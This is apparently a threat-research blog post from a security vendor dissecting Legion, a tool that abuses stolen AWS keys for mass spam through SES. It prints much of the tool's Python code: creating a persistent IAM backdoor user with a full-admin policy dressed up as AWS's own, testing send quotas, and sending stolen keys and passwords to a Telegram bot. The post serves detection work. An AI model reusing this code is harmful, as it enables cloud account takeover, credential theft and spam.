Announcing YetiHunter: An open-source tool to detect and hunt for suspicious activity in Snowflake

Illustration Cloud

Legion: The Latest Threat in Mass Spam Attacks


As the old proverb says, “Great minds think alike”. Many people may not know or remember the second half of that proverb, “Fools seldom differ.” Both sides of these adages are very well represented throughout this article. Researchers (great minds) from Permiso and Cado security simultaneously stumbled onto a new attack tool, dramatically called Legion, that is focused on mail abuse and SMS spam via services like Amazon SES and Twilio. This tool looks eerily similar (Fools seldom differ) to Andr0xGhost, Greenbot, VIOLENT, and a few other for sale spam attack scripts.

In the spirit of collaboration, Cado and Permiso researchers are tag teaming a breakdown of Legion’s toolset. Since we (Permiso) have already talked at length about similar variants, the rest of this article will dive into some of the differences of Legion compared to AndroxGh0st and Greenbot. For a full breakdown of Legion specifically, head over to the Cado Security blog.

Legion Modules

Legion has many different modules for various technologies. In this article we are going to focus on a few of the modules that are specific to AWS. If you would like to ride along, you can find this script on VirusTotal (MD5: ddc6963f98e57090e0a78559c7212498).


Our favorite feature in these scripts is the persistence. Legion is mostly using the same playbook as similar tools, with one extra little touch: they add tags to the IAM user they create.


By default, Legion creates a user named ses_legion for persistence. One thing that stands out with Legion compared to other similar tools is that it also adds the tag: Owner:ms.boharas to the created user. While it is often hard to understand the motivations of the attacker, we suspect this was added to evade detections that looks for users that have been created with no tags associated to them.

def create_new_user(iam_client, user_name='ses_legion'):
        user = None
                user = iam_client.create_user(
                        Tags=[{'Key': 'Owner', 'Value': 'ms.boharas'}]
        except ClientError as e:
                if e.response['Error']['Code'] == 'EntityAlreadyExists':
                        result_str = get_random_string()
                        user_name = 'ses_{}'.format(result_str)
                        user = iam_client.create_user(UserName=user_name,
                        Tags=[{'Key': 'Owner', 'Value': 'ms.boharas'}]
        return user_name, user


Legion creates a group with the name SESAdminGroup . Attackers often use generic names like this for groups, policy and user creations.

def creat_new_group(iam_client, group_name='SESAdminGroup'):
                res = iam_client.create_group(GroupName=group_name)
        except ClientError as e:
                if e.response['Error']['Code'] == 'EntityAlreadyExists':
                        result_str = get_random_string()
                        group_name = "SESAdminGroup{}".format(result_str)
                        res = iam_client.create_group(GroupName=group_name)
        return res['Group']['GroupName']


Legion creates a policy named AdministratorAccess if it doesn’t already exist to allow for all actions against all resources. This is an attempt to masquerade as the default AdministratorAccess AWS managed policy.

def creat_new_policy(iam_client, policy_name='AdministratorAccess'):
        policy_json = {"Version": "2012-10-17","Statement":
        [{"Effect": "Allow", "Action": "*","Resource": "*"}]}
                res = iam_client.create_policy(
        except ClientError as e:
                if e.response['Error']['Code'] == 'EntityAlreadyExists':
                        result_str = get_random_string()
                        policy_name = "AdministratorAccess{}".format(result_str)
                        res = iam_client.create_policy(PolicyName=policy_name,
        return res['Policy']['Arn']


When setting a password for the created user, Legion sets the reset required to false.

def creat_profile(iam_client, user_name, pwd):
        response = iam_client.create_login_profile(
            UserName=user_name, Password=pwd, PasswordResetRequired=False)
        return response


Of note in the initialize function, Legion defaults to using the us-east-1 region. This is configurable though.

def initialize_item(item, service='ses'):
        ACCESS_ID = item['id']
        ACCESS_KEY = item['key']
        REGION = item['region']
        if REGION is None:
                REGION = 'us-east-1'
                return boto3.client(service, region_name=REGION,
        except Exception:


The make_user function pulls this all together:

  • Creates a new user with the name ses_legion and the tag Owner:ms.boharas

  • Creates a group with the name SESAdminGroup

  • Creates a policy called AdministratorAccess that gives full access

  • Attaches the policy directly to ses_legion IAM user

  • Sets a password

  • Creates a login profile for console access abilities

  • Adds the ses_legion IAM User to the group SESAdminGroup

  • Logs the result of this activity to a Telegram bot

def make_user(iam_client, item, limit_data):
                user_name, user_data = create_new_user(iam_client)
                grp_name = creat_new_group(iam_client)
                policy_arn = creat_new_policy(iam_client)
                up = att_usr_policy(iam_client, user_name, policy_arn)
                password = "{}0089#".format(user_name)
                profile = creat_profile(iam_client, user_name, password)
                added_to_grp = att_usr_grp(iam_client, user_name, grp_name)

                if user_data:
                        user_arn = user_data['User']['Arn']
                        user_id = None
                        if user_arn:
                                user_id = user_arn.split(':')[4]

                        with open('AWS_ByPass/!Users_Cracked.txt', 'a') as tt:
                                dd = json.dumps(user_data, indent=4, sort_keys=True, default=default)
                                data = ("ACESS_ID={}\nACCESS_KEY={}\nREGION={}\nAmazon IAM User & Pass\n"
                                .format(item['id'], item['key'], item['region'],user_name, password, user_id)
                                tt.write(data + "\n")
                                tt.write(dd + "\n\n")
                                tt.write("Limit for user:\n")
                                if limit_data:
                                        tt.write(limit_data + "\n")
                                tt.write("{}\n".format("*" * 10))

                                message = {'text': f"🔥  Legion SMTP 6.5 BOT [AWS Console]\n🏦 Amazon IAM User & Pass\n\nUser: {user_name}\nPass= {password}\nIAM= {user_id}\n\nACESS_ID= {item['id']}\nACCESS_KEY= {item['key']}\nREGION= {item['region']}\nAWS Console Hacked ❤\n"}
                      "" + bot_token +"/sendMessage?chat_id=" + chat_id ,data=message)
                                print(f"{yl}[{fc}AWS CHECKER{yl}] {gr}CREATED ID: {fc}{item['id']} {gr}and Access Token/UserID {fc}{user_id}")
        except IOError as e:
                print(f"{yl}[{fc}AWS CHECKER{yl}] {red}Error writing to file for new {fc}USER")
        except ClientError as e:
                print(f"{yl}[{fc}AWS CHECKER{yl}] {red}Failed to create user with ID: {fc}{item['id']}")
        except Exception as e:
                print(f"{yl}[{fc}AWS CHECKER{yl}] {red}Create Failed: {item['id']}")

Amazon Simple Email Service (SES) Abuse

One of the goals of Legion is to abuse SES in order to send mass spam emails. The modules below are part of this functionality.


Legion assesses the email sending capability of an account by examining the Max24HourSend response element. A response value of 200 in Max24HourSend signifies that the key and account are in a sandbox status, which will not provide a means of abuse. Any other value greater than 200 may indicate a potential for attack. If the account is not in a sandbox status, Legion can analyze the output of the SentLast24Hours response element to determine the number of remaining messages that can be sent within 24 hours after subtracting the value from Max24HourSend. However, as a spoiler, it doesn’t appear legion entirely understood the idea of the sandbox or they didn’t care and prefer to let the script error until it moves on to the next account.

def check_limit(ses_client, item):
                l = ses_client.get_send_quota()
                return f"{item['id']}:{item['key']}:{item['region']}:{l['SentLast24Hours']}/{l['Max24HourSend']} Remaining"
        except Exception as e:
                print(f"{yl}[{fc}AWS CHECKER{yl}] {red}Limit Failed: {item['id']}")


Somewhat self explanatory, Legion wants to verify the data and send a message. To do this, they send an email with the available sender and receiver data they have. A successful email, which means the email was accepted for delivery, will return a messageId response element which Legion later uses before writing the successful details to file.

def check_sending(client, receiver, sender, item, limit_info, iam):
        subj = f"{item['id']}"
        msg = f"*** SMTP DATA ***\n\n"\
        f"AWS_ID:     {item['id']}\nAWS_KEY:    "\
        f"{item['key']}\nAWS_REGION: {item['region']}\nFROM:       {sender}\n"\
        f"SERVER:     email-{item['region']}\nPORT:       587 or 25\n\n"\
        f"IAM_USER:   {iam}\n\nLimit Info: {limit_info}"
                return client.send_email(
                        Destination={'ToAddresses': receiver},
                        'Subject': {'Data': f'SMTP_KEY: email-smtp.{item["region"]}',
                        'Charset': 'UTF-8'},
                        'Body': {'Text': {
                        'Data': msg,
                        'Charset': 'UTF-8'
        except Exception as e:

get_identities, fetch_user, process, begin_check

In the final functions around SES Abuse, Legion starts by returning a list of identities via get_identities. fetch_user is used to verify a user creation process as part of begin_check, the created user is based on the obtained credentials and written to a file along with the data from check_limit. Why Legion chooses to write the limit details along with the user is unclear, we’ll note now that the SES send quota is not per user but per account. The process function brings many of the previous steps together and is later called by begin_check if the result of check_limit exists. While Legion checks that the limit data exists several times leading up to the process call, they do it again once in the function before also running get_identities and looping through the identities as the sender for the check_sending function. If a messageId is returned from check_sending they consider this a success and write to the success file !Good_ses_smtp.txt, otherwise they look to write output to the failed file !BAD_ses_smtp.txt and post the failed information to there telegram chat. It’s here Legion could have saved time in knowing that sandbox would have always failed unless sending to verified emails or domains.

def get_identities(client):
                return client.list_identities()['Identities']
        except Exception:

def fetch_user(client):
                return client.get_user()['User']
        except Exception:

def process(ses_client, receiver, item, limit=None, iam=None):
        if limit:
                limit = limit.split(':')[3]
        idt = get_identities(ses_client)
        res = None
        if idt:
                for fr in idt:
                        res = check_sending(ses_client, receiver, fr, item, limit, iam)
                        if res:
                                with open('AWS_ByPass/!Good_ses_smtp.txt', 'a') as lr:
                                        sm = f"{item['id']}:{item['key']}:email-{item['region']}{fr}:587:{limit}\n"
                                print(f"{yl}[{fc}AWS CHECKER{yl}] {gr}SENDING SUCCESSFUL: {yl}{item['id']} : {gr}{limit}")
                if not res:
                        with open('AWS_ByPass/!BAD_ses_smtp.txt', 'a') as lr:
                                sm = f"{item['id']}:{item['key']}:{item['region']}\n"
                                message = {'text': f"🔥  Legion SMTP 6.5 BOT [AWS STATUS]\n🏦 KEY= {item['id']}\nSECRET= {item['key']}\nREGION= {item['region']}\nSTATUS=> Sending Paused ⛔\n"}
                      "" + bot_token +"/sendMessage?chat_id=" + chat_id ,data=message)

                                print(f"{yl}[{fc}AWS CHECKER{yl}]  {red}Sending Failed: {yl}{sm}")

def begin_check(d, to=emailnow):
        item = {}
        limit = None
        data = d.split(':')
        total = len(data)
        bcode = 'TEVHSU9OIDYuNg=='
        receiver = [to, base64.b64decode(bcode).decode('utf-8')]
        iam_user = None
        if total >= 3:
                if data[2]:
                        item['id'] = data[0]
                        item['key'] = data[1]
                        item['region'] = data[2]
                        ses_client = initialize_item(item)
                        if ses_client:
                                limit = check_limit(ses_client, item)
                        iam_client = initialize_item(item, service='iam')
                        if iam_client:
                                mu = make_user(iam_client, item, limit)
                                iam = fetch_user(iam_client)
                        if limit:
                                remain = limit.split(':')[3]
                                print(f"{yl}[{fc}AWS CHECKER{yl}]  {fc}Limit for {item['id']}: {remain}")
                                process(ses_client, receiver, item, limit=limit, iam=None)
                                print(f"{yl}[{fc}AWS CHECKER{yl}]  {red}Failed limit check: {item['id']}")
                                process(ses_client, receiver, item, limit=None, iam=None)
                print(f"[!] Skipped: {d}")


Mail and SMS abuse are big business for attackers. We have come across close to a dozen variants of similar scripts that are being sold regularly for nefarious purposes. Legion is not the first nor will it be the last. Luckily with the amount of similarities in these toolsets, the methodology based detections we put in place and described in /blog/s/approach-to-detection-androxgh0st-greenbot-persistence are resilient enough to to detect all the variants we have discovered so far being used against any of our clients here at Permiso.

Illustration Cloud

Related Articles

Introducing YetiHunter: An open-source tool to detect and hunt for suspicious activity in Snowflake

Summary On May 30, 2024 Snowflake confirmed many clients were affected by an attacker leveraging compromised NHI credentials to perform data theft. In their notice, Snowflake included some indicators and suggested hunts. Our good friends at Mandiant

Extending Cloud Console Cartographer With New Mappings

Last month Permiso’s P0 Labs released the Cloud Console Cartographer open-source framework and corresponding research presentation at Black Hat Asia in Singapore. Recently we released our full suite of unit tests. Now let’s talk about how to extend

Unmasking Adversary Cloud Defense Evasion Strategies: Modify Cloud Compute Infrastructure Part 2

Detection and Mitigation The 'Create Snapshot', ‘Create Cloud Instance’, ‘Delete Cloud Instance’, ‘Revert Cloud Instance’ and ‘Modify Cloud Compute Configurations’ features are widely available across major cloud platforms such as AWS, Azure, and

View more posts